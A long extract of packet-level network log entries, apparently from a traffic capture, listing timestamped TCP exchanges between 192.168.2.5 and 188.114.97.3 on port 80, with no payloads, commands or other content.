                              Aug 27, 2024 09:48:54.031142950 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.031152964 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.031162977 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.031169891 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.031191111 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.031349897 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.031366110 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.031375885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.031385899 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.031395912 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.031395912 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.031405926 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.031414032 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.031418085 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.031429052 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.031438112 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.031443119 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.031478882 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.032391071 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.032407045 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.032416105 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.032417059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.032500029 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.032556057 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.032566071 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.032574892 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.032583952 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.032593012 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.032628059 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.032753944 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.032766104 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.032776117 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.032787085 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.032789946 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.032795906 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.032876968 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.032901049 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.032929897 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.032941103 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.032951117 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.032960892 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.032969952 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.032980919 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.033000946 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.033077002 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.033135891 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.033145905 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.033262014 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.033354044 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.033497095 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.033505917 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.033510923 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.033524036 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.033535004 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.033545017 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.033591986 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.033623934 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.033674955 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.033684969 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.033693075 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.033704996 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.033718109 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.033720016 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.033727884 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.033735991 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.033739090 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.033761978 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.033791065 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.033886909 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.034800053 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.034816980 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.034827948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.034874916 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.034885883 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.034936905 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.034951925 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.034961939 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.034972906 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.034985065 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.035057068 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.035069942 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.035079956 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.035110950 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.035181999 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.035192013 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.035201073 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.035212040 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.035222054 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.035253048 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.035327911 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.036422014 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.036432028 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.036437035 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.036499023 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.036550999 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.036567926 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.036576986 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.036587954 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.036592960 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.036617994 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.036721945 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.036731958 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.036741018 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.036751986 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.036761999 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.036765099 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.036777973 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.036781073 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.036806107 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.036875010 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.036885977 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.036894083 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.036904097 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.036912918 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.036915064 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.036930084 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.036938906 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.036941051 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.036951065 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.036959887 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.036962032 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.036971092 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.036981106 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.036982059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.037009001 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.037019014 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.037241936 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.037252903 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.037261963 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.037272930 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.037295103 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.037365913 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.037504911 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.037516117 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.037524939 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.037535906 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.037544966 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.037555933 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.037648916 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.059722900 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.059734106 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.059742928 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.059776068 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.059786081 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.059794903 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.059806108 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.060029984 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.122530937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.122541904 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.122545958 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.122550964 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.122555971 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.122565985 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.122674942 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.122684956 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.122694016 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.122704029 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.122714043 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.122724056 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.122761011 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.122807980 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.122838020 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.122848988 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.122888088 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.122958899 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.122971058 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.122980118 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.123003006 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.123097897 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.123109102 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.123117924 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.123127937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.123138905 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.123148918 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.123163939 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.123169899 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.123255968 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.123342991 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.123353958 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.123363018 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.123374939 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.123430014 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.123437881 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.123449087 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.123456955 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.123466969 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.123472929 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.123478889 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.123490095 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.123502016 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.123512983 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.123548031 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.123570919 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.124089003 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124099970 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124109030 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124119043 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124129057 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124139071 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124150991 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124161005 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124171972 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124182940 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124188900 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.124193907 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124207020 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124214888 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.124218941 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124233961 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.124253035 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.124358892 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124371052 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124381065 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124392033 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124394894 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.124403000 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124416113 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124427080 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124437094 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124452114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124459982 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124473095 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124484062 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.124516964 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.124677896 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124687910 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124696970 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124754906 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.124790907 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124804020 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124814034 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124825954 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124830961 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.124838114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124850035 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124855995 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.124861002 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124871969 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.124886036 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.124974966 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.125154018 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.125164986 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.125184059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.125201941 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.125231028 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.125257969 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.125269890 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.125278950 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.125291109 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.125305891 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.125325918 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.125386000 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.125397921 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.125406981 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.125444889 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.125483036 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.125493050 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.125502110 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.125511885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.125519991 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.125523090 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.125536919 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.125538111 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.125560999 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.125812054 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.125828981 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.125900030 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.125910044 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.125919104 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.126029968 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.126044035 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.126060009 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.126070976 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.126080990 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.126091003 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.126101017 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.126106024 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.126112938 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.126121998 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.126136065 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.126152039 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.126353979 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.126363993 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.126368046 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.126373053 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.126377106 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.126471043 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.150903940 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.150918007 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.150929928 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.150940895 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.150996923 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.151021004 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.151031971 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.151045084 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.151076078 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.151077986 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.151098967 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.203145981 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.212172031 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.212193966 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.212205887 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.212295055 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.212332964 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.212344885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.212354898 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.212368965 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.212378979 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.212390900 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.212553024 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.212563038 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.212574959 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.212585926 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.212593079 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.212598085 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.212606907 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.212616920 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.212624073 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.212627888 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.212639093 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.212641001 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.212666035 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.212680101 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.212811947 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.212822914 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.212831974 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.212842941 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.212856054 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.212857008 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.212869883 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.212877035 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.212954044 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.212964058 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.212970018 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.212986946 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.212997913 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.213002920 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.213036060 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.213094950 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.213109970 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.213120937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.213131905 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.213144064 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.213148117 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.213157892 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.213169098 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.213171005 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.213182926 CEST8061383188.114.97.3192.168.2.5
